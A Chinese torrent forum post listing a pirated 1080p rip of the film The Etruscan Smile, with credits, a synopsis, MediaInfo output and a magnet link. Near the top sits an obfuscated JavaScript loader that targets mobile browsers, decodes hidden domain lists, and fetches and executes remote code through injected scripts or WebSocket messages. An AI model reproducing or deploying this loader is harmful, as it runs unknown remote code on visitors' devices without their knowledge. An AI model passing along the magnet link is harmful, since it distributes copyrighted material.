爷爷的微笑[中文字幕].The.Etruscan.Smile.2018.1080p.BluRay.DTS.x265-10bit-迅雷下载 8.20GB

版主小s 16天前 216

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 爷爷的微笑 / 伊特鲁里亚的微笑 / Rory's Way

◎片 名 The Etruscan Smile

◎年 代 2018

◎产 地 英国

◎类 别 剧情

◎语 言 英语

◎上映日期 2018-04-12(德国)

◎IMDb链接 https://www.imdb.com/title/tt5459382/

◎豆瓣链接 https://movie.douban.com/subject/26808828/

◎片 长 103分钟

◎导 演 欧迪·宾南 Oded Binnun (id:1308534)

米哈尔·布雷兹斯 Mihal Brezis (id:1308535)

◎编 剧 麦克·迈克高文 Michael McGowan (id:1195533)

◎演 员 索拉·伯奇 Thora Birch (id:1031804)

布莱恩·考克斯 Brian Cox (id:1019027)

约翰·约瑟夫·菲尔德 JJ Feild (id:1274382)

彼德·考约特 Peter Coyote (id:1027864)

乔什·斯坦伯 Josh Stamberg (id:1152605)

瓦内萨·罗斯 Vanessa Ross (id:1330973)

娜塔莉·斯蒂芬妮·阿吉拉尔 Natalie Stephany Aguilar (id:1373168)

特里萨·纳瓦罗 Teresa Navarro (id:1349377)

Rupinder Nagra Rupinder Nagra (id:1305492)

史蒂文·韦格 Steven Wiig (id:1171750)

安东尼·斯诺 Anthony Snow (id:1154124)

桑德拉·狄 Sandra Dee (id:1045021)

金娜琼 Christina July Kim (id:1250131)

罗姗娜·阿奎特 Rosanna Arquette (id:1025210)

小詹姆斯·J·德 James J. Der Jr. (id:1429568)

◎标 签 温情 / 家庭 / 英国 / 2018 / 美国 / 欧洲 / 剧情 / 人性

◎简 介

Rory MacNeil, a rugged old Scotsman, travels to San Francisco to seek medical treatment. He moves in with his estranged son Ian, as he sees his life getting transformed through a newfound bond with his baby grandson.

  1. General

  2. Unique ID : 207384044381915684350158492925808545296 (0x9C04B6CFAC154B1B28058BF657730E10)

  3. Complete name : [email protected].COM.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.20 GiB

  7. Duration : 1 h 47 min

  8. Overall bit rate : 10.9 Mb/s

  9. Movie name : The Etruscan Smile 2018 1080p BluRay DTS [email protected]

  10. Encoded date : UTC 2021-07-18 00:28:14

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 47 min

  20. Bit rate : 9 331 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.253

  30. Stream size : 7.03 GiB (86%)

  31. Title : [email protected]

  32. Writing library : x265 - H.265/HEVC codec

  33. Default : Yes

  34. Forced : No


  35. Audio

  36. ID : 2

  37. Format : DTS

  38. Format/Info : Digital Theater Systems

  39. Codec ID : A_DTS

  40. Duration : 1 h 47 min

  41. Bit rate mode : Constant

  42. Bit rate : 1 509 kb/s

  43. Channel(s) : 6 channels

  44. Channel layout : C L R Ls Rs LFE

  45. Sampling rate : 48.0 kHz

  46. Frame rate : 93.750 FPS (512 SPF)

  47. Bit depth : 24 bits

  48. Compression mode : Lossy

  49. Stream size : 1.14 GiB (14%)

  50. Title : English

  51. Language : English

  52. Default : Yes

  53. Forced : No


  54. Text #1

  55. ID : 3

  56. Format : PGS

  57. Muxing mode : zlib

  58. Codec ID : S_HDMV/PGS

  59. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  60. Duration : 1 h 42 min

  61. Bit rate : 31.8 kb/s

  62. Count of elements : 2439

  63. Stream size : 23.4 MiB (0%)

  64. Title : CHS

  65. Language : Chinese

  66. Default : Yes

  67. Forced : No


  68. Text #2

  69. ID : 4

  70. Format : PGS

  71. Muxing mode : zlib

  72. Codec ID : S_HDMV/PGS

  73. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  74. Duration : 1 h 42 min

  75. Bit rate : 32.5 kb/s

  76. Count of elements : 2439

  77. Stream size : 23.9 MiB (0%)

  78. Title : CHT

  79. Language : Chinese

  80. Default : No

  81. Forced : No


  82. Menu

  83. 00:00:00.000 : en:Chapter 01

  84. 00:06:05.031 : en:Chapter 02

  85. 00:10:55.780 : en:Chapter 03

  86. 00:16:36.996 : en:Chapter 04

  87. 00:21:23.741 : en:Chapter 05

  88. 00:25:45.878 : en:Chapter 06

  89. 00:31:50.283 : en:Chapter 07

  90. 00:37:29.330 : en:Chapter 08

  91. 00:44:05.226 : en:Chapter 09

  92. 00:48:11.847 : en:Chapter 10

  93. 00:53:32.793 : en:Chapter 11

  94. 00:58:11.988 : en:Chapter 12

  95. 01:03:33.101 : en:Chapter 13

  96. 01:08:42.368 : en:Chapter 14

  97. 01:15:26.981 : en:Chapter 15

  98. 01:22:23.355 : en:Chapter 16

  99. 01:30:05.317 : en:Chapter 17

  100. 01:37:44.567 : en:Chapter 18

  101. 01:43:39.672 : en:Chapter 19



TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:37B955F4C65C4EBB8BC8C320EDB230F8A758251E
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回